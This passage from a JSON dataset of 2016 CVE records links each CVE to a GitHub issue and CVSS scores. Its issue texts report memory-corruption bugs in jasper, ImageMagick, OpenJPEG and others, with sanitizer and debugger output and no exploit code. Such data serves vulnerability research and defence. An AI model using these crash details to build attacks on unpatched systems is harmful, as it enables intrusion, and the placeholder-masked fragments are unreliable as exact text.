  3622. "description": "jasper NUMBERTAG Heap Buffer Overflow vulnerabilities due to some programming mistake (different from NUMBERTAG overview Different from NUMBERTAG The vulnerability is found in jasper NUMBERTAG and is a Heap Buffer Overflow vulnerabilities. The vulnerability exists in code responsible for decoding the input image to a JP2 file. The vulnerability is a Heap Buffer Overflow vulnerability which can cause Out of Bound write due to a programming mistake (i.e. a mistake when setting the size of a memory allocation). The vulnerability can cause Denial of Service and may cause Remote Code Execution. Analysis and APITAG The detail analysis report and APITAG file can be found in the attachment. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: Bingchang, Liu @ VARAS of IIE email: l.bingchang. EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
  3623. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3624. "severity": "HIGH",
  3625. "baseScore": 7.8,
  3626. "impactScore": 5.9,
  3627. "exploitabilityScore": 1.8
  3628. },
  3629. {
  3630. "CVE_ID": "CVE-2016-8654",
  3631. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/93",
  3632. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/93",
  3633. "Repo_new": "jasper-software/jasper",
  3634. "Issue_Created_At": "2016-11-25T17:57:27Z",
  3635. "description": "jasper NUMBERTAG Heap Buffer Overflow vulnerabilities due to some programming mistake. Overview I have found a Heap Buffer Overflow vulnerability in jasper NUMBERTAG The vulnerability exists in code responsible for decoding the input image to a JP2 file. The vulnerability is a Heap Buffer Overflow vulnerability which can cause Out of Bound write due to a programming mistake (i.e. a mistake when setting the size of a memory allocation). The vulnerability can cause Denial of Service and may cause Remote Code Execution. Analysis and Poc The detail analysis report and APITAG file can be found in the attachmen. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: Bingchang, Liu @ VARAS of IIE email: l.bingchang. EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
  3636. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3637. "severity": "HIGH",
  3638. "baseScore": 7.8,
  3639. "impactScore": 5.9,
  3640. "exploitabilityScore": 1.8
  3641. },
  3642. {
  3643. "CVE_ID": "CVE-2016-8659",
  3644. "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/107",
  3645. "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/107",
  3646. "Repo_new": "containers/bubblewrap",
  3647. "Issue_Created_At": "2016-10-13T09:36:29Z",
  3648. "description": "privilege escalation via ptrace ( CVETAG ). Sebastian Krahmer reported this to the oss security mailing list URLTAG . I have not analyzed whether this is a practical vulnerability or whether it is based on some faulty assumption. ERRORTAG",
  3649. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  3650. "severity": "HIGH",
  3651. "baseScore": 7.0,
  3652. "impactScore": 5.9,
  3653. "exploitabilityScore": 1.0
  3654. },
  3655. {
  3656. "CVE_ID": "CVE-2016-8677",
  3657. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/268",
  3658. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/268",
  3659. "Repo_new": "imagemagick/imagemagick",
  3660. "Issue_Created_At": "2016-09-14T13:44:14Z",
  3661. "description": "memory allocation failure in APITAG (quantum.c). A crafted image causes a memory allocation failure. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG",
  3662. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3663. "severity": "HIGH",
  3664. "baseScore": 8.8,
  3665. "impactScore": 5.9,
  3666. "exploitabilityScore": 2.8
  3667. },
  3668. {
  3669. "CVE_ID": "CVE-2016-8678",
  3670. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/272",
  3671. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/272",
  3672. "Repo_new": "imagemagick/imagemagick",
  3673. "Issue_Created_At": "2016-09-14T13:56:59Z",
  3674. "description": "heap based buffer overflow in APITAG (pixel accessor.h). A crafted image causes an heap overflow. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG FILETAG",
  3675. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3676. "severity": "MEDIUM",
  3677. "baseScore": 5.5,
  3678. "impactScore": 3.6,
  3679. "exploitabilityScore": 1.8
  3680. },
  3681. {
  3682. "CVE_ID": "CVE-2016-8862",
  3683. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/271",
  3684. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/271",
  3685. "Repo_new": "imagemagick/imagemagick",
  3686. "Issue_Created_At": "2016-09-14T13:55:47Z",
  3687. "description": "memory allocation failure in APITAG (memory.c) different from NUMBERTAG A crafted image causes a memory allocation failure. Reproduce with: identify $FILE I'm attaching the testcase as a zip because of the github's limitation. Tested on NUMBERTAG ERRORTAG FILETAG",
  3688. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3689. "severity": "HIGH",
  3690. "baseScore": 8.8,
  3691. "impactScore": 5.9,
  3692. "exploitabilityScore": 2.8
  3693. },
  3694. {
  3695. "CVE_ID": "CVE-2016-8882",
  3696. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/30",
  3697. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/30",
  3698. "Repo_new": "jasper-software/jasper",
  3699. "Issue_Created_At": "2016-10-16T22:51:00Z",
  3700. "description": "segfault / null pointer access in jpc_pi_destroy. The attached file will crash jasper (can be tested with imginfo) with a null pointer access. It was found with american fuzzy lop. FILETAG Stack trace from address sanitizer NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG f bp NUMBERTAG fc8 sp NUMBERTAG fffa1dea NUMBERTAG T NUMBERTAG f NUMBERTAG e in jpc_pi_destroy PATHTAG NUMBERTAG f NUMBERTAG f in jpc_dec_tilefini PATHTAG NUMBERTAG bd in jpc_dec_process_eoc PATHTAG NUMBERTAG fb4 in jpc_dec_decode PATHTAG NUMBERTAG fb4 in jpc_decode PATHTAG NUMBERTAG f NUMBERTAG in jas_image_decode PATHTAG NUMBERTAG f NUMBERTAG cf in main PATHTAG NUMBERTAG f2ac NUMBERTAG f in __libc_start_main APITAG NUMBERTAG d8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in jpc_pi_destroy NUMBERTAG ABORTING",
  3701. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3702. "severity": "MEDIUM",
  3703. "baseScore": 5.5,
  3704. "impactScore": 3.6,
  3705. "exploitabilityScore": 1.8
  3706. },
  3707. {
  3708. "CVE_ID": "CVE-2016-8883",
  3709. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/32",
  3710. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/32",
  3711. "Repo_new": "jasper-software/jasper",
  3712. "Issue_Created_At": "2016-10-16T23:00:10Z",
  3713. "description": "assert in APITAG The attached file causes an assert in the function jpc_dec_tiledecode. Found with american fuzzy lop. FILETAG Error message: imginfo: APITAG int jpc_dec_tiledecode(jpc_dec_t , jpc_dec_tile_t ): Assertion `dec >numcomps NUMBERTAG failed.",
  3714. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3715. "severity": "MEDIUM",
  3716. "baseScore": 5.5,
  3717. "impactScore": 3.6,
  3718. "exploitabilityScore": 1.8
  3719. },
  3720. {
  3721. "CVE_ID": "CVE-2016-9112",
  3722. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/855",
  3723. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/855",
  3724. "Repo_new": "uclouvain/openjpeg",
  3725. "Issue_Created_At": "2016-10-27T12:26:55Z",
  3726. "description": "APITAG Point Exception) in PATHTAG Vulnerability openjpeg FPE in pi.c NUMBERTAG ersion openjpeg NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG b NUMBERTAG d NUMBERTAG f (pc NUMBERTAG b NUMBERTAG d NUMBERTAG f bp NUMBERTAG bfcb NUMBERTAG c8 sp NUMBERTAG bfcb NUMBERTAG T NUMBERTAG b NUMBERTAG d NUMBERTAG e ( PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bbd NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bbb NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e2bf ( PATHTAG NUMBERTAG b NUMBERTAG a2d6 ( PATHTAG NUMBERTAG b NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG d ( PATHTAG NUMBERTAG b NUMBERTAG ab5a ( PATHTAG NUMBERTAG f7 ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG FPE ( PATHTAG ) GDB information Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb NUMBERTAG ed in opj_pi_next_cprl (pi NUMBERTAG dfb8) at PATHTAG NUMBERTAG if (!((pi >y % (OPJ_INT NUMBERTAG comp >dy APITAG y == pi >ty0) && ((try0 APITAG dy NUMBERTAG gdb) p rpy NUMBERTAG gdb) p comp >dy <<< rpy A syntax error in expression, near `< rpy'. (gdb) p comp >dy APITAG dy APITAG dy << rpy). Poc Contact me if you need Poc file at EMAILTAG",
  3727. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3728. "severity": "HIGH",
  3729. "baseScore": 7.5,
  3730. "impactScore": 3.6,
  3731. "exploitabilityScore": 3.9
  3732. },
  3733. {
  3734. "CVE_ID": "CVE-2016-9113",
  3735. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/856",
  3736. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/856",
  3737. "Repo_new": "uclouvain/openjpeg",
  3738. "Issue_Created_At": "2016-10-29T03:21:27Z",
  3739. "description": "NULL point derefence in function imagetobmp of convertbmp.c. DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG f NUMBERTAG pc NUMBERTAG cc0 bp NUMBERTAG bfad5d NUMBERTAG sp NUMBERTAG bfad5cc0 T NUMBERTAG cbf ( PATHTAG NUMBERTAG b8 ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Program received signal SIGSEGV, Segmentation fault NUMBERTAG b NUMBERTAG in imagetobmp (image NUMBERTAG b NUMBERTAG c0, outfile NUMBERTAG bfa3efd4 APITAG at PATHTAG NUMBERTAG r = image APITAG h ((i) / (w NUMBERTAG w + (i) % (w)]; (rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG Analysis step1: p_image_dest APITAG = NULL APITAG step2: opj_j2k_exec (p_j2k,p_j2k APITAG APITAG > APITAG > APITAG p_j2k APITAG NUMBERTAG p_go_on NUMBERTAG l_go_on NUMBERTAG step3: APITAG the program accesses image APITAG However data is still NULL Poc Contact me if you need Poc file at EMAILTAG",
  3740. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3741. "severity": "HIGH",
  3742. "baseScore": 7.5,
  3743. "impactScore": 3.6,
  3744. "exploitabilityScore": 3.9
  3745. },
  3746. {
  3747. "CVE_ID": "CVE-2016-9114",
  3748. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/857",
  3749. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/857",
  3750. "Repo_new": "uclouvain/openjpeg",
  3751. "Issue_Created_At": "2016-10-29T08:19:23Z",
  3752. "description": "NULL Pointer Access in function imagetopnm of APITAG DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG eaf bp NUMBERTAG bfc NUMBERTAG a8 sp NUMBERTAG bfc NUMBERTAG T NUMBERTAG eae ( PATHTAG NUMBERTAG c ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Breakpoint NUMBERTAG imagetopnm (image NUMBERTAG d2d5c0, outfile NUMBERTAG bfb NUMBERTAG APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red = image APITAG (rr) p red NUMBERTAG int NUMBERTAG bfb NUMBERTAG rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG rr) c Continuing. Program received signal SIGSEGV, Segmentation fault NUMBERTAG b NUMBERTAG in imagetopnm (image NUMBERTAG d2d5c0, outfile NUMBERTAG bfb NUMBERTAG APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red + APITAG ++red; Analysis image APITAG = NULL and it was assigned to red, so the program accesses to red, segment fault occurs. Poc Contact me if you need Poc file at EMAILTAG",
  3753. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3754. "severity": "HIGH",
  3755. "baseScore": 7.5,
  3756. "impactScore": 3.6,
  3757. "exploitabilityScore": 3.9
  3758. },
  3759. {
  3760. "CVE_ID": "CVE-2016-9115",
  3761. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/858",
  3762. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/858",
  3763. "Repo_new": "uclouvain/openjpeg",
  3764. "Issue_Created_At": "2016-10-29T08:45:59Z",
  3765. "description": "Heap Buffer Overflow in function imagetotga of APITAG DESCRIPTION OPENJPEG Heap Buffer Overflow in function imagetotga of APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b4a NUMBERTAG at pc NUMBERTAG b NUMBERTAG bp NUMBERTAG bfcb8de8 sp NUMBERTAG bfcb8ddc READ of size NUMBERTAG at NUMBERTAG b4a NUMBERTAG thread T NUMBERTAG b1f ( PATHTAG NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b4a NUMBERTAG is located NUMBERTAG bytes to the left of NUMBERTAG byte region NUMBERTAG b4a NUMBERTAG b4a NUMBERTAG allocated by thread T0 here NUMBERTAG f4 ( PATHTAG NUMBERTAG b NUMBERTAG e0c ( PATHTAG NUMBERTAG b NUMBERTAG f ( PATHTAG NUMBERTAG b NUMBERTAG cb NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG faa NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG d0: fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG e NUMBERTAG fa fa fa[fa]fa NUMBERTAG f NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Analysis come soon Poc Contact me if you need Poc file at EMAILTAG",
  3766. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3767. "severity": "MEDIUM",
  3768. "baseScore": 6.5,
  3769. "impactScore": 3.6,
  3770. "exploitabilityScore": 2.8
  3771. },
  3772. {
  3773. "CVE_ID": "CVE-2016-9116",
  3774. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/859",
  3775. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/859",
  3776. "Repo_new": "uclouvain/openjpeg",
  3777. "Issue_Created_At": "2016-10-29T08:53:27Z",
  3778. "description": "NULL Pointer Access in function imagetopnm of APITAG . DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f bp NUMBERTAG bfe NUMBERTAG sp NUMBERTAG bfe NUMBERTAG T NUMBERTAG e ( PATHTAG NUMBERTAG ce ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Breakpoint NUMBERTAG imagetoraw_common (image NUMBERTAG a NUMBERTAG c0, outfile NUMBERTAG bf8b NUMBERTAG APITAG big_endian NUMBERTAG at PATHTAG NUMBERTAG ptr = image APITAG (rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG rr) n NUMBERTAG for (line NUMBERTAG line APITAG APITAG = NULL and it was assigned to ptr, so the program accesses to ptr, segment fault occurs. Poc Contact me if you need Poc file at EMAILTAG",
  3779. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3780. "severity": "MEDIUM",
  3781. "baseScore": 6.5,
  3782. "impactScore": 3.6,
  3783. "exploitabilityScore": 2.8
  3784. },
  3785. {
  3786. "CVE_ID": "CVE-2016-9117",
  3787. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/860",
  3788. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/860",
  3789. "Repo_new": "uclouvain/openjpeg",
  3790. "Issue_Created_At": "2016-10-29T09:30:52Z",
  3791. "description": "NULL Pointer Access in function imagetopnm of APITAG DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ca7 bp NUMBERTAG bfd NUMBERTAG sp NUMBERTAG bfd NUMBERTAG T NUMBERTAG ca6 ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information (rr) p image >comps NUMBERTAG d NUMBERTAG dy NUMBERTAG w NUMBERTAG h NUMBERTAG y NUMBERTAG prec NUMBERTAG bpp NUMBERTAG sgnd NUMBERTAG resno_decoded NUMBERTAG factor NUMBERTAG data NUMBERTAG alpha NUMBERTAG Poc Contact me if you need Poc file at EMAILTAG",
  3792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3793. "severity": "MEDIUM",
  3794. "baseScore": 6.5,
  3795. "impactScore": 3.6,
  3796. "exploitabilityScore": 2.8
  3797. },
  3798. {
  3799. "CVE_ID": "CVE-2016-9118",
  3800. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/861",
  3801. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/861",
  3802. "Repo_new": "uclouvain/openjpeg",
  3803. "Issue_Created_At": "2016-10-30T03:53:07Z",
  3804. "description": "Heap Buffer Overflow in function pnmtoimage of convert.c. Description APITAG Heap Buffer Overflow in function pnmtoimage of APITAG Testing Environment Ubuntu NUMBERTAG APITAG Exception Information Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG f4 at pc NUMBERTAG bp NUMBERTAG bffe NUMBERTAG sp NUMBERTAG bffe NUMBERTAG c WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG f4 thread T NUMBERTAG PATHTAG NUMBERTAG b6 ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f4 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f4) allocated by thread T0 here NUMBERTAG f4 ( PATHTAG NUMBERTAG b NUMBERTAG e0c ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG b6 ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG ae NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING GDB Information Program received signal SIGSEGV, Segmentation fault NUMBERTAG cb5 in pnmtoimage (filename NUMBERTAG bf9b1e NUMBERTAG APITAG parameters NUMBERTAG bf9b NUMBERTAG at PATHTAG NUMBERTAG image APITAG = (((uc>>bit NUMBERTAG rr) p i NUMBERTAG rr) p NUMBERTAG rr) p y NUMBERTAG rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG e8 (rr) p h NUMBERTAG rr) p w NUMBERTAG rr) p image APITAG Cannot access memory at address NUMBERTAG Analysis ERRORTAG Poc Contact me if you need Poc file at EMAILTAG",
  3805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  3806. "severity": "MEDIUM",
  3807. "baseScore": 5.3,
  3808. "impactScore": 1.4,
  3809. "exploitabilityScore": 3.9
  3810. },
  3811. {
  3812. "CVE_ID": "CVE-2016-9177",
  3813. "Issue_Url_old": "https://github.com/perwendel/spark/issues/700",
  3814. "Issue_Url_new": "https://github.com/perwendel/spark/issues/700",
  3815. "Repo_new": "perwendel/spark",
  3816. "Issue_Created_At": "2016-11-04T12:13:25Z",
  3817. "description": "Arbitrary File Read Vulnerability. Just posting it here so it gets visbility, I didn't write the original message: URLTAG There appears to be a vulnerability which lets users read any file from the file system",
  3818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  3819. "severity": "HIGH",
  3820. "baseScore": 7.5,
  3821. "impactScore": 3.6,
  3822. "exploitabilityScore": 3.9
  3823. },
  3824. {
  3825. "CVE_ID": "CVE-2016-9189",
  3826. "Issue_Url_old": "https://github.com/python-pillow/Pillow/issues/2105",
  3827. "Issue_Url_new": "https://github.com/python-pillow/pillow/issues/2105",
  3828. "Repo_new": "python-pillow/pillow",
  3829. "Issue_Created_At": "2016-09-06T17:36:21Z",
  3830. "description": "Multiple memory corruption vulnerabilities. While performing a security assessment for a client, we identified a number of potential memory corruption vulnerabilities within the native extensions included with Pillow. Given that these vulnerabilities may currently represent exploitable conditions within our client's environment we, would like to report their details privately. Could a project member please limit the visibility of this issue so that it is not available to the public? Alternatively, we can provide vulnerability details via e mail if that is preferable. Thank you, Cris Neckar Divergent Security",
  3831. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  3832. "severity": "MEDIUM",
  3833. "baseScore": 5.5,
  3834. "impactScore": 3.6,
  3835. "exploitabilityScore": 1.8
  3836. },
  3837. {
  3838. "CVE_ID": "CVE-2016-9243",
  3839. "Issue_Url_old": "https://github.com/pyca/cryptography/issues/3211",
  3840. "Issue_Url_new": "https://github.com/pyca/cryptography/issues/3211",
  3841. "Repo_new": "pyca/cryptography",
  3842. "Issue_Created_At": "2016-11-01T19:47:20Z",
  3843. "description": "HKDF key length inconsistency. For too small key sizes, APITAG outputs an empty array instead of a small key: Program: CODETAG Output: APITAG Suggested fix: I am not quite sure why the division by NUMBERTAG in the snippet below was added. The cumulative size of the output array is always APITAG and thus we can stop after APITAG . At first I thought this might be a clever trick taken from the paper, but I didn't find it there. I guess there was a mixup between bits and bytes at some point. ERRORTAG",
  3844. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  3845. "severity": "HIGH",
  3846. "baseScore": 7.5,
  3847. "impactScore": 3.6,
  3848. "exploitabilityScore": 3.9
  3849. },
  3850. {
  3851. "CVE_ID": "CVE-2016-9274",
  3852. "Issue_Url_old": "https://github.com/git-for-windows/git/issues/944",
  3853. "Issue_Url_new": "https://github.com/git-for-windows/git/issues/944",
  3854. "Repo_new": "git-for-windows/git",
  3855. "Issue_Created_At": "2016-11-04T17:15:19Z",
  3856. "description": "EXE hijacking runs unexpected code when using context menus in Windows Explorer. Setup Which version of Git for Windows are you using? Is it NUMBERTAG bit or NUMBERTAG bit? FILETAG Which version of Windows are you running? Vista NUMBERTAG Is it NUMBERTAG bit or NUMBERTAG bit? Windows NUMBERTAG What options did you set as part of the installation? Or did you choose the defaults? Defaults ` One of the following: C:\\>type APITAG PATHTAG Path Option: Cmd SSH Option: APITAG CRLF Option: APITAG Bash Terminal Option: APITAG Performance Tweaks APITAG Enabled Enable Symlinks: Disabled Any other interesting things about your environment that might be related to the issue you're seeing? Don't think so. Had some buddies reproduce the issue on Windows NUMBERTAG Details Which terminal/shell are you running Git from? e.g PATHTAG Windows Explorer What commands did you run to trigger this issue? Here is an example of the steps to reproduce in Windows Explorer URLTAG What did you expect to occur after running these commands? Open Git Bash in the current folder What actually happened instead? Arbitrary file named APITAG in the current folder was executed. This has security implications since users will not expect this behavior when using Windows context menus. For example, a security conscious user would know not to execute EXE files included in an untrusted repository, but using Windows context menus could unexpectedly execute such untrusted code. This issue is similar to DLL hijacking if you are familiar with that. Here is a brief explanation of DLL hijacking if you're not familiar URLTAG",
  3857. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3858. "severity": "HIGH",
  3859. "baseScore": 7.8,
  3860. "impactScore": 5.9,
  3861. "exploitabilityScore": 1.8
  3862. },
  3863. {
  3864. "CVE_ID": "CVE-2016-9298",
  3865. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/296",
  3866. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/296",
  3867. "Repo_new": "imagemagick/imagemagick",
  3868. "Issue_Created_At": "2016-10-31T22:18:46Z",
  3869. "description": "crash. PATHTAG Overall demo of the major APITAG methods. use APITAG use aliased APITAG => 'im'; Read model & smile image. print APITAG $null=im >new; $null APITAG $x=$null APITAG warn \"$x\" if \"$x\"; $model=im APITAG $x=$model APITAG warn \"$x\" if \"$x\"; $model APITAG $model APITAG $smile=im >new; $x=$smile APITAG warn \"$x\" if \"$x\"; $smile APITAG $smile APITAG Create image stack. print APITAG APITAG $images=im APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Resize'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Sharpen'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Threshold'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Noise'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Gamma'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Level'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( 